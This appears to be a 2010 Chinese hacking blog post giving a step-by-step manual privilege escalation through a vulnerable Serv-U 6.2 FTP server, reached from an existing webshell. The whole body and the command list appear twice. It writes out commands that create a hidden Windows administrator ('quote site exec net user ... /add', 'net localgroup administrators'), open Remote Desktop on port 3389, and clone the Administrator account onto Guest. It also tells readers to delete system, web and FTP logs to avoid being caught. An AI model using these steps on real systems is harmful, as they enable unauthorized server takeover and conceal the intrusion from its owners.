订阅
看紧你的3306端口,一次通过mysql的检测
经典的Webshell提权技术总结
手工FTP提权
作者:admin 日期:2010-02-07
开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个
wscript.shell √ 命令行执行组件
在看看这里 开了终端了 有时候没开也会显示3389
个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的
方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2
有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权
连得上 说明开着 (小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下)
接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的
我简单说明一下就好了 Add User 这里是添加 Del User 删除
RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了
FTP帐号 lake 密码 admin123
连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开
说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用户
200 EXEC command successful (TID=33).
成功 继续添加权限
200 EXEC command successful (TID=33) OK了
服务器的3389已经被我开过了 我简单演示一下怎么开就OK了
用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了
集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去
现在看操作 我用工具传过去比较方便点
命令 quote site exec Aio.exe -Terminal 3389
在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以
OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接
登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了
走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽
清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了
就到这里 88咯
相关命令:
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提权命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add
wscript.shell √ 命令行执行组件
在看看这里 开了终端了 有时候没开也会显示3389
个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的
方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2
有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权
连得上 说明开着 (小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下)
接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的
我简单说明一下就好了 Add User 这里是添加 Del User 删除
RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了
FTP帐号 lake 密码 admin123
连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开
说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用户
200 EXEC command successful (TID=33).
成功 继续添加权限
200 EXEC command successful (TID=33) OK了
服务器的3389已经被我开过了 我简单演示一下怎么开就OK了
用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了
集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去
现在看操作 我用工具传过去比较方便点
命令 quote site exec Aio.exe -Terminal 3389
在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以
OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接
登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了
走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽
清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了
就到这里 88咯
相关命令:
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提权命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add
文章来自: 
Tags: 评论: 0 | 查看次数: 8534
